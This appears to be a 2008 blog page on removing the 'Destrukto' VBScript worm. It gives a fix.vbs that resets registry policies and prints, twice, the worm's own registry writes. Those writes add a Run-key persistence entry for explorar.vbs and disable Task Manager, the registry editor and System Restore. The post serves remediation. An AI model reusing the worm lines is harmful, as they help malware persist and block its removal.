Dim fix
Set fix = WScript.CreateObject("WScript.Shell")
fix.regwrite "HKCU\Software\Microsoft\Internet Explorer\Main\Window Title","Microsoft Internet Explorer"
fix.regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFind",0,"REG_DWORD"
fix.regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun",0,"REG_DWORD"
fix.regwrite "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools",0,"REG_DWORD"
fix.regwrite "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr",0,"REG_DWORD"
fix.regwrite "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden",1,"REG_DWORD"
fix.regwrite "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\NoFolderOptions",0,"REG_DWORD"
fix.regwrite "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore\DisableConfig",0,"REG_DWORD"
fix.regwrite "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore\DisableSR",0,"REG_DWORD"
fix.regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDriveTypeAutoRun",1,"REG_DWORD"
Copy the script above and rename it to whatever you like,(fix.vbs). It is important to have an extension of vbs so that it will be a script. And now you can use task manager to kill the "wscript.exe" and to find that annoying explorar.vbs.
Wednesday, February 27, 2008
Tuesday, February 12, 2008
Is your computer not responding?
Why not try to update your anti-virus software? You may not know it, but even the simplest of all anti-virus maybe powerful against new worms or viruses. Just as long as you keep them updated. I use NOD32 and my computer is virus or wormfree. Plus I am always on the look out for new viruses, "manually". Searching for unusual process from my Process Monitor. Just as long as you keep watch of your system, you'll be fine.
Script for Destrukto Worm
ran.regwrite "HKCU\Software\Microsoft\Internet Explorer\Main\Window Title","DESTRUKTO!!!!!"
ran.regwrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Run\Explorer",wendows&"\system32\explorar.vbs"
ran.regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFind",1,"REG_DWORD"
ran.regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun",1,"REG_DWORD"
ran.regwrite "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools",1,"REG_DWORD"
ran.regwrite "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr",1,"REG_DWORD"
ran.regwrite "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden",0,"REG_DWORD"
ran.regwrite "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\NoFolderOptions",1,"REG_DWORD"
ran.regwrite "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore\DisableConfig",1,"REG_DWORD"
ran.regwrite "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore\DisableSR",1,"REG_DWORD"
ran.regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDriveTypeAutoRun",0,"REG_DWORD"
You have to download a process explorer and a registry editor first to edit and reverse the key that are listed here. Just do an internet search for those two files that are needed.
ran.regwrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Run\Explorer",wendows&"\system32\explorar.vbs"
ran.regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFind",1,"REG_DWORD"
ran.regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun",1,"REG_DWORD"
ran.regwrite "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools",1,"REG_DWORD"
ran.regwrite "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr",1,"REG_DWORD"
ran.regwrite "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden",0,"REG_DWORD"
ran.regwrite "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\NoFolderOptions",1,"REG_DWORD"
ran.regwrite "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore\DisableConfig",1,"REG_DWORD"
ran.regwrite "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore\DisableSR",1,"REG_DWORD"
ran.regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDriveTypeAutoRun",0,"REG_DWORD"
You have to download a process explorer and a registry editor first to edit and reverse the key that are listed here. Just do an internet search for those two files that are needed.
Subscribe to:
Posts (Atom)
